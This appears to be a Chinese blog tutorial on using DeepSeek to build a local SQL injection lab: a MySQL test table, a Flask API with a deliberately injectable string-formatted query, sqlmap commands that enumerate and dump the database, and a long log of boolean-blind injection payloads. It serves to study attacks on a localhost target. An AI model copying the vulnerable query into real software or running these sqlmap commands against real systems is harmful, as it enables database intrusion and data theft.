网络安全-使用DeepSeek来获取sqlmap的攻击payload

文章目录


概述

今天来使用DeepSeek做安全测试,看看在有思路的情况下实现的快不快。

DeepSeek使用

我有一个思路,想要测试sqlmap工具如何dump数据库的:

连接mysql数据库,创建测试库、表,表至少包含整型、字符型列,插入示例数据

使用Python Flask编写一个API查询数据库并返回内容

使用sqlmap攻击该API

查看API日志

请优化我的思路,并给出相关的代码

创建示例数据库

sql 复制代码
-- 创建测试数据库
CREATE DATABASE sqlmap_test;

-- 创建包含多种数据类型的表
USE sqlmap_test;
CREATE TABLE users (
    id INT PRIMARY KEY AUTO_INCREMENT,
    username VARCHAR(50),
    email VARCHAR(100),
    age INT,
    created_at DATETIME DEFAULT CURRENT_TIMESTAMP,
    profile TEXT,
    is_admin BOOLEAN DEFAULT FALSE
);

-- 插入测试数据
INSERT INTO users (username, email, age, profile, is_admin) VALUES
('admin', '[email protected]', 30, 'System Administrator', TRUE),
('user1', '[email protected]', 25, 'Regular user profile', FALSE),
('test_user', '[email protected]', 28, 'Another test user', FALSE);

创建API

python 复制代码
# app.py
import json
from flask import Flask, request, jsonify
import pymysql
from datetime import datetime
import logging
from logging.handlers import RotatingFileHandler
from setting import *

app = Flask(__name__)

# 配置数据库连接
db_config = {
    "host": DB_HOST,
    "user": DB_USER,
    "password": DB_PASSWORD,
    "db": DB_NAME,
    "port": DB_PORT,
    "charset": "utf8mb4",
    "cursorclass": pymysql.cursors.DictCursor
}


# 配置日志系统
def setup_logger():
    # 清除默认处理程序
    app.logger.handlers.clear()

    # 统一日志格式
    formatter = logging.Formatter(
        '[%(asctime)s] %(levelname)s in %(module)s: %(message)s'
    )

    # 访问日志配置
    access_handler = RotatingFileHandler(
        'access.log',
        maxBytes=1024 * 1024,
        backupCount=5,
        delay=True  # 延迟文件打开直到实际写入
    )
    access_handler.setFormatter(formatter)
    access_handler.setLevel(logging.INFO)
    app.logger.addHandler(access_handler)
    app.logger.setLevel(logging.INFO)

    # SQL日志配置(独立logger)
    sql_handler = RotatingFileHandler(
        'sql.log',
        maxBytes=1024 * 1024,
        backupCount=5,
        delay=True
    )
    sql_handler.setFormatter(formatter)
    sql_handler.setLevel(logging.INFO)

    sql_logger = logging.getLogger('sql')
    sql_logger.propagate = False  # 禁止传播到根logger
    sql_logger.setLevel(logging.INFO)
    sql_logger.addHandler(sql_handler)


# 确保在应用初始化后配置日志
setup_logger()


def get_db_connection():
    return pymysql.connect(**db_config)


@app.route('/users', methods=['GET'])
def get_users():
    search = request.args.get('search', '')
    # 强制立即刷新访问日志
    app.logger.info(f"Access: {request.method} {request.path} - Params: {dict(request.args)}")
    app.logger.handlers[0].flush()
    conn = get_db_connection()
    try:

        with conn.cursor() as cursor:
            # 存在漏洞的查询
            query = f"SELECT * FROM users WHERE username = '{search}'"

            # 记录SQL并强制刷新
            sql_logger = logging.getLogger('sql')
            sql_logger.info(f"EXECUTE SQL: {query}")
            sql_logger.handlers[0].flush()

            cursor.execute(query)
            results = cursor.fetchall()

        # 转换datetime为字符串
        for row in results:
            if 'created_at' in row and isinstance(row['created_at'], datetime):
                row['created_at'] = row['created_at'].isoformat()
        app.logger.info(json.dumps(results), exc_info=True)
        return jsonify(results)
    except pymysql.Error as e:
        # 记录完整错误信息
        error_msg = f"Database error ({e.args[0]}): {e.args[1]}"
        app.logger.error(error_msg, exc_info=True)
        app.logger.handlers[0].flush()
        return jsonify({"error": "Database error"})
    except Exception as e:
        app.logger.error(f"Unexpected error: {str(e)}", exc_info=True)
        app.logger.handlers[0].flush()
        return jsonify({"error": "Server error"})
    finally:
        if 'conn' in locals():
            conn.close()


if __name__ == '__main__':
    # 禁用重载器以避免重复日志
    app.run(host='0.0.0.0', port=5000, debug=False, use_reloader=False)

运行后访问

bash 复制代码
http://127.0.0.1:5000/users?search=test_user

结果如下:

测试sqlmap

bash 复制代码
python sqlmap.py -u "http://localhost:5000/users?search=test_user" --technique=B --threads 8 -dbs --batch
python sqlmap.py -u "http://localhost:5000/users?search=test_user" --technique=B --threads 8 -D sqlmap_test --tables --batch
python sqlmap.py -u "http://localhost:5000/users?search=test_user" --technique=B --threads 8 -D sqlmap_test -T users --columns --batch
python sqlmap.py -u "http://localhost:5000/users?search=test_user" --technique=B --threads 8 -D sqlmap_test -T users -C id,username,is_admin -dump --dump-format csv --batch




整体来说,实现的还挺快的,只有API实现时微调了一下日志和响应码。

ps:话说我只是测试下DeepSeek,sqlmap咋还出错了,两个test_user是什么鬼...

部分日志

bash 复制代码
[2025-03-01 21:55:51,918] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(username) AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),1,1))>51 AND 'FFDM'='FFDM'
[2025-03-01 21:55:54,058] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(username) AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),1,1))>54 AND 'FFDM'='FFDM'
[2025-03-01 21:55:54,139] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(username) AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),1,1))>52 AND 'FFDM'='FFDM'
[2025-03-01 21:55:56,258] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(username) AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),1,1))>53 AND 'FFDM'='FFDM'
[2025-03-01 21:55:56,343] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(username) AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),2,1))>51 AND 'FFDM'='FFDM'
[2025-03-01 21:55:59,600] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(username) AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),2,1))>48 AND 'FFDM'='FFDM'
[2025-03-01 21:55:59,682] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(username) AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),2,1))>9 AND 'FFDM'='FFDM'
[2025-03-01 21:56:01,814] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),1,1))>64 AND 'FFDM'='FFDM'
[2025-03-01 21:56:01,819] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),3,1))>64 AND 'FFDM'='FFDM'
[2025-03-01 21:56:01,828] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),2,1))>64 AND 'FFDM'='FFDM'
[2025-03-01 21:56:01,828] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),4,1))>64 AND 'FFDM'='FFDM'
[2025-03-01 21:56:01,829] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),5,1))>64 AND 'FFDM'='FFDM'
[2025-03-01 21:56:01,898] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),1,1))>96 AND 'FFDM'='FFDM'
[2025-03-01 21:56:04,070] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),3,1))>96 AND 'FFDM'='FFDM'
[2025-03-01 21:56:04,070] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),2,1))>96 AND 'FFDM'='FFDM'
[2025-03-01 21:56:04,074] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),1,1))>112 AND 'FFDM'='FFDM'
[2025-03-01 21:56:04,074] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),5,1))>96 AND 'FFDM'='FFDM'
[2025-03-01 21:56:04,074] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),4,1))>96 AND 'FFDM'='FFDM'
[2025-03-01 21:56:04,167] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),2,1))>112 AND 'FFDM'='FFDM'
[2025-03-01 21:56:06,190] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),5,1))>112 AND 'FFDM'='FFDM'
[2025-03-01 21:56:06,190] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),1,1))>104 AND 'FFDM'='FFDM'
[2025-03-01 21:56:06,190] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),4,1))>112 AND 'FFDM'='FFDM'
[2025-03-01 21:56:06,197] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),3,1))>112 AND 'FFDM'='FFDM'
[2025-03-01 21:56:06,266] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),2,1))>104 AND 'FFDM'='FFDM'
[2025-03-01 21:56:06,284] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),5,1))>104 AND 'FFDM'='FFDM'
[2025-03-01 21:56:08,317] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),4,1))>104 AND 'FFDM'='FFDM'
[2025-03-01 21:56:08,317] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),3,1))>104 AND 'FFDM'='FFDM'
[2025-03-01 21:56:08,318] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),1,1))>100 AND 'FFDM'='FFDM'
[2025-03-01 21:56:08,372] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),2,1))>100 AND 'FFDM'='FFDM'
[2025-03-01 21:56:08,406] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),5,1))>108 AND 'FFDM'='FFDM'
[2025-03-01 21:56:08,408] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),4,1))>108 AND 'FFDM'='FFDM'
[2025-03-01 21:56:10,575] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),1,1))>98 AND 'FFDM'='FFDM'
[2025-03-01 21:56:10,575] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),4,1))>106 AND 'FFDM'='FFDM'
[2025-03-01 21:56:10,575] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),2,1))>98 AND 'FFDM'='FFDM'
[2025-03-01 21:56:10,575] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),5,1))>110 AND 'FFDM'='FFDM'
[2025-03-01 21:56:10,576] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),3,1))>108 AND 'FFDM'='FFDM'
[2025-03-01 21:56:10,670] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),1,1))>97 AND 'FFDM'='FFDM'
[2025-03-01 21:56:12,724] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),5,1))>109 AND 'FFDM'='FFDM'
[2025-03-01 21:56:12,738] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),2,1))>99 AND 'FFDM'='FFDM'
[2025-03-01 21:56:12,739] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),3,1))>110 AND 'FFDM'='FFDM'
[2025-03-01 21:56:12,740] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),4,1))>105 AND 'FFDM'='FFDM'
[2025-03-01 21:56:12,838] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),3,1))>109 AND 'FFDM'='FFDM'

参考

腾讯元宝
sqlmap

相关推荐
hunzi_15 小时前
筑牢数字防线:商城系统安全的多维守护策略
安全·系统安全
群联云防护小杜6 小时前
云服务器主动防御策略与自动化防护(下)
运维·服务器·分布式·安全·自动化·音视频
视觉&物联智能6 小时前
【杂谈】-人工智能驱动的网络安全威胁:新一代网络钓鱼
网络·人工智能·web安全·网络安全·安全威胁分析
博睿谷IT99_6 小时前
网络安全怎么入门?快速了解
安全·web安全
学习溢出8 小时前
【网络安全】网络钓鱼的类型
网络·安全·网络安全·网络钓鱼·社会工程
fmingzh9 小时前
NVIDIA高级辅助驾驶安全与技术读后感
人工智能·安全·自动驾驶
Blossom.1189 小时前
量子网络:构建未来通信的超高速“高速公路”
网络·opencv·算法·安全·机器学习·密码学·量子计算
落——枫10 小时前
网络安全知识点3
安全·web安全
柴郡猫^O^10 小时前
OSCP - Proving Grounds - Wpwn
安全·网络安全·安全性测试
安全系统学习10 小时前
网络安全之红队LLM的大模型自动化越狱
运维·人工智能·安全·web安全·机器学习·php